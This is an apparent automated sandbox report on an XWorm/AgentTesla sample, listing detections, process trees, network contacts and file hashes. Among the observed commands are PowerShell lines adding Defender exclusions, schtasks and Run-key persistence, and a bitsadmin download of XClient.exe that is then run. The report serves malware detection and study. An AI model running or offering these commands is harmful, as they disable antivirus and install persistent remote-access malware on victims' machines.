Analysis Overview
SHA256
6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7
Threat Level: Known bad
The file XWorm V5.2.rar was found to be: Known bad.
Malicious Activity Summary
Xworm family
Xworm
Contains code to disable Windows Defender
AgentTesla payload
Agenttesla family
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Checks computer location settings
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-02 22:42
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral28
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:39
Platform
win10v2004-20240802-en
Max time kernel
422s
Max time network
425s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:27
Platform
win7-20240708-en
Max time kernel
357s
Max time network
362s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:35
Platform
win10v2004-20240802-en
Max time kernel
599s
Max time network
419s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\q11111 | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe
"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Public\q11111
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/540-0-0x00007FFD52CB3000-0x00007FFD52CB5000-memory.dmp
memory/540-1-0x0000000000780000-0x0000000001D02000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | 767d4d113ea2e9d9886b2aa1710db7f3 |
| SHA1 | f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0 |
| SHA256 | b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f |
| SHA512 | ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41 |
memory/1624-14-0x0000000000010000-0x0000000000060000-memory.dmp
memory/1624-16-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp
memory/1624-54-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp
memory/4484-60-0x00000197143C0000-0x00000197143E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1soeebal.sdx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0cef0ab8fb4f5e4162ce67e844c3aa54 |
| SHA1 | 4deb083986e41017371af415c8a0829da4a9f626 |
| SHA256 | b0aa3ab509f749d4ec08cd6ec38a707d1b3c18f1386e5bcf017119cda834adbe |
| SHA512 | 0f562119e6229d1bcaa3e34253685dc255cbb419515218876c1868e70f9f95d9f158a2658272e3f4bd9d7276aee79d5d2ae05ce8bfb453aa4b6af6ae84a90541 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98baf5117c4fcec1692067d200c58ab3 |
| SHA1 | 5b33a57b72141e7508b615e17fb621612cb8e390 |
| SHA256 | 30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51 |
| SHA512 | 344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d |
memory/1624-102-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp
memory/1624-103-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\q11111.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:38
Platform
win7-20240708-en
Max time kernel
361s
Max time network
365s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:36
Platform
win7-20240729-en
Max time kernel
596s
Max time network
361s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe
"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {328C09D4-728B-4380-B0EA-3FA004774498} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.example.com | udp |
| US | 93.184.215.14:80 | www.example.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
